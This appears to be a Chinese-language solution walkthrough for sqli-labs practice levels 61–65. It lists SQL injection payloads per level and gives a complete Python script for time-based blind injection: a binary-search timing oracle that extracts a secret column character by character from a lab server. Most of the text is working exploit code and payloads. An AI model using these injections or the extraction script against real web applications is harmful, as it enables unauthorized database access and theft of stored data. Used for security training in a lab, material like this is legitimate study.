61
payload:?id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
62
payload:?id=1') and (length(database())=10) %23
或者
payload:?id=1' and (length(database())=10) and '1'='1
本题次数限制130次,爆破是没办法了。
import requests
import time
# Candidate alphabet for the blind search.  Keep it ordered by code point:
# binary() bisects this string by position while the SQL probes compare
# ascii(substr(...)) against ord(chSet[mid]), so the two orders must agree.
chSet = (
    "0123456789"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
)
# Characters recovered so far; binary() appends one per successful search.
res = ""
def binary(start, end, process, index=0):
    """Bisect chSet[start..end] for the character that ``process`` selects.

    ``process`` is a yes/no oracle: it returns 1 when the wanted value is at
    or below the probed point and -1 when it is above, so the search keeps
    the lower half on 1 and the upper half on -1.  How the probe is phrased
    depends on ``index``:

    * truthy ``index`` -> ``process(ord(chSet[mid]), index)``: compare the
      code point of the midpoint character and forward ``index`` (the substr
      position for the SQL probes).  chSet is ordered by code point, so
      bisecting positions bisects code points.
    * falsy ``index``  -> ``process(mid)``: compare the position itself.

    The character at the winning position is appended to the module-level
    ``res``; nothing is returned to the caller.  Any oracle value other than
    1 / -1 stops the search without touching ``res``.

    Returns:
        0 when ``start >= end`` on entry (nothing to search), otherwise None.
    """
    global res
    lo, hi = start, end
    # Degenerate range: nothing to probe, record the only candidate.
    if lo >= hi:
        res += chSet[lo]
        return 0
    while lo < hi:
        mid = (lo + hi) // 2
        if index:
            verdict = process(ord(chSet[mid]), index)
        else:
            verdict = process(mid)
        if verdict == 1:
            hi = mid  # answer is at mid or below
        elif verdict == -1:
            lo = mid + 1  # answer is above mid
        else:
            return None  # no usable answer from the oracle; leave res alone
    res += chSet[lo]
    return None
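def getDatabase(chrAscii, index, *, delay=1, timeout=None):
    """Time-based probe: is ascii(substr(database(), index, 1)) <= chrAscii?

    Sends one request to the Less-10 endpoint (injection context ``id=1" ``,
    pre-encoded as ``1%22%20``) and infers the answer from the response time:
    a delayed response means the injected sleep() ran, i.e. the condition
    held.  Shaped as the ``process`` callback of ``binary`` (returns 1 / -1).
    Not used by the ``__main__`` block of this script.

    Args:
        chrAscii: inclusive upper bound on the character's code point.
        index: 1-based position in database() (MySQL substr semantics).
        delay: seconds the server is told to sleep when the condition is
            true.  Raise it on a slow or noisy link: a round trip that takes
            longer than ``delay`` on its own is misread as "true", and every
            probe burns one request of the challenge's budget.
        timeout: read timeout for the request; defaults to ``delay + 10`` so
            a stalled connection fails instead of hanging the whole search.

    Returns:
        1 if the response took at least ``delay`` seconds, else -1.

    Raises:
        requests.exceptions.RequestException: connection error or timeout.
    """
    if timeout is None:
        timeout = delay + 10
    url = "http://localhost/Less-10/?id=1%22%20"
    # The payload is pre-encoded and appended verbatim.  Do not route it
    # through requests' params=, which would re-encode the quote/comment
    # characters and break the injection.  "--+" becomes "-- " server-side.
    payload = (
        "and%20if(ascii(substr(database(),{},1))<={},"
        "sleep({}),0)--+"
    ).format(index, chrAscii, delay)
    # monotonic() is immune to wall-clock adjustments that would corrupt a
    # timing oracle measured in seconds.
    started = time.monotonic()
    requests.get(url=url + payload, timeout=timeout)
    elapsed = time.monotonic() - started
    return 1 if elapsed >= delay else -1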
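def getLen(index, *, delay=1, timeout=None):
    """Time-based probe: is length(database()) <= index?

    NOTE(review): the original payload read ``length(select)``, which is a
    MySQL syntax error — the query never reaches sleep(), so every probe was
    reported as false.  ``database()`` is assumed to be the intended target
    because ``getDatabase`` hits the same Less-10 endpoint; confirm against
    the challenge before relying on it.

    Meant to be driven as ``binary(0, 61, getLen)`` (falsy ``index`` path),
    where ``index`` is the bisection position itself.  Note that ``binary``
    then records the answer as ``chSet[length]`` in ``res`` (e.g. 'A' for a
    length of 10), not as a number.

    Args:
        index: inclusive upper bound to test the length against.
        delay: seconds the server is told to sleep when the condition is
            true; raise it on a slow link (see ``getDatabase``).
        timeout: read timeout for the request; defaults to ``delay + 10``.

    Returns:
        1 if the response took at least ``delay`` seconds, else -1.

    Raises:
        requests.exceptions.RequestException: connection error or timeout.
    """
    if timeout is None:
        timeout = delay + 10
    url = "http://localhost/Less-10/?id=1%22%20"
    # Pre-encoded payload appended verbatim; see getDatabase for why it
    # must not go through requests' params=.
    payload = (
        "and%20if(length(database())<={},"
        "sleep({}),0)--+"
    ).format(index, delay)
    started = time.monotonic()
    requests.get(url=url + payload, timeout=timeout)
    elapsed = time.monotonic() - started
    return 1 if elapsed >= delay else -1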
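def getKeyCol(chrAscii, index, *, delay=1, timeout=None):
    """Time-based probe for one character of a column name of 0a3tw0cifu.

    The subquery ``... limit 2,1`` selects the third column of table
    ``0a3tw0cifu`` in information_schema order; this asks whether
    ascii(substr(<that name>, index, 1)) <= chrAscii and reads the answer
    from the response time (delayed => sleep() ran => true).  Shaped as the
    ``process`` callback of ``binary``.  Not used by the ``__main__`` block.

    Args:
        chrAscii: inclusive upper bound on the character's code point.
        index: 1-based position in the column name (MySQL substr semantics).
        delay: seconds the server is told to sleep when the condition is
            true.  Raise it on a slow or noisy link: a round trip that takes
            longer than ``delay`` on its own is misread as "true", and every
            probe burns one request of the challenge's budget.
        timeout: read timeout for the request; defaults to ``delay + 10`` so
            a stalled connection fails instead of hanging the whole search.

    Returns:
        1 if the response took at least ``delay`` seconds, else -1.

    Raises:
        requests.exceptions.RequestException: connection error or timeout.
    """
    if timeout is None:
        timeout = delay + 10
    # Injection context is id=('1') — the payload opens with ") pre-encoded
    # as %27) and ends the statement with a "-- " comment (sent as --+).
    url = "http://192.168.124.4/Less-62/?id=1%27)%20"
    # Appended verbatim: requests' params= would re-encode the quote.
    payload = (
        "and%20if(ascii(substr((select column_name from information_schema.columns "
        "where table_name='0a3tw0cifu' limit 2,1),{},1))<={},"
        "sleep({}),0)--+"
    ).format(index, chrAscii, delay)
    # monotonic() is immune to wall-clock adjustments that would corrupt a
    # timing oracle measured in seconds.
    started = time.monotonic()
    requests.get(url=url + payload, timeout=timeout)
    elapsed = time.monotonic() - started
    return 1 if elapsed >= delay else -1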
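def getKey(chrAscii, index, *, delay=1, timeout=None):
    """Time-based probe for one character of secret_E6PD in table 0a3tw0cifu.

    Asks the Less-62 endpoint whether
    ascii(substr((select secret_E6PD from 0a3tw0cifu), index, 1)) <= chrAscii
    and infers the answer from the response time: a delayed response means
    the injected sleep() ran, i.e. the condition held.  Shaped as the
    ``process`` callback of ``binary`` (returns 1 / -1); this is the probe
    the ``__main__`` block drives.

    Args:
        chrAscii: inclusive upper bound on the character's code point.
        index: 1-based position in the secret (MySQL substr semantics).
        delay: seconds the server is told to sleep when the condition is
            true.  Raise it on a slow or noisy link: a round trip that takes
            longer than ``delay`` on its own is misread as "true", and every
            probe burns one request of the challenge's budget (the post cites
            a 130-attempt cap for this level).
        timeout: read timeout for the request; defaults to ``delay + 10`` so
            a stalled connection fails instead of hanging the whole search.

    Returns:
        1 if the response took at least ``delay`` seconds, else -1.

    Raises:
        requests.exceptions.RequestException: connection error or timeout.
    """
    if timeout is None:
        timeout = delay + 10
    # Injection context is id=('1') — the payload opens with ") pre-encoded
    # as %27) and ends the statement with a "-- " comment (sent as --+).
    url = "http://192.168.124.4/Less-62/?id=1%27)%20"
    # Appended verbatim: requests' params= would re-encode the quote.
    payload = (
        "and%20if(ascii(substr((select secret_E6PD from 0a3tw0cifu),{},1))<={},"
        "sleep({}),0)--+"
    ).format(index, chrAscii, delay)
    # monotonic() is immune to wall-clock adjustments that would corrupt a
    # timing oracle measured in seconds.
    started = time.monotonic()
    requests.get(url=url + payload, timeout=timeout)
    elapsed = time.monotonic() - started
    return 1 if elapsed >= delay else -1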
if __name__ == "__main__":
    # Recover a 24-character secret one position at a time; substr is
    # 1-based, hence positions 1..24.  Each position is bisected over the
    # 62-entry chSet (indices 0..61), i.e. up to about 6 probes per character.
    # NOTE(review): the post cites a 130-request cap for this level and
    # 24 x ~6 probes can exceed it — confirm before running against the lab.
    for position in range(1, 25):
        binary(0, 61, getKey, position)
    print(res)
布尔盲注和时间盲注均可,以上是时间盲注脚本
63
payload:?id=1' and (length(database())=10) %23
64
payload:?id=1)) and (length(database())=10) %23
65
payload:?id=1") and (length(database())=10) %23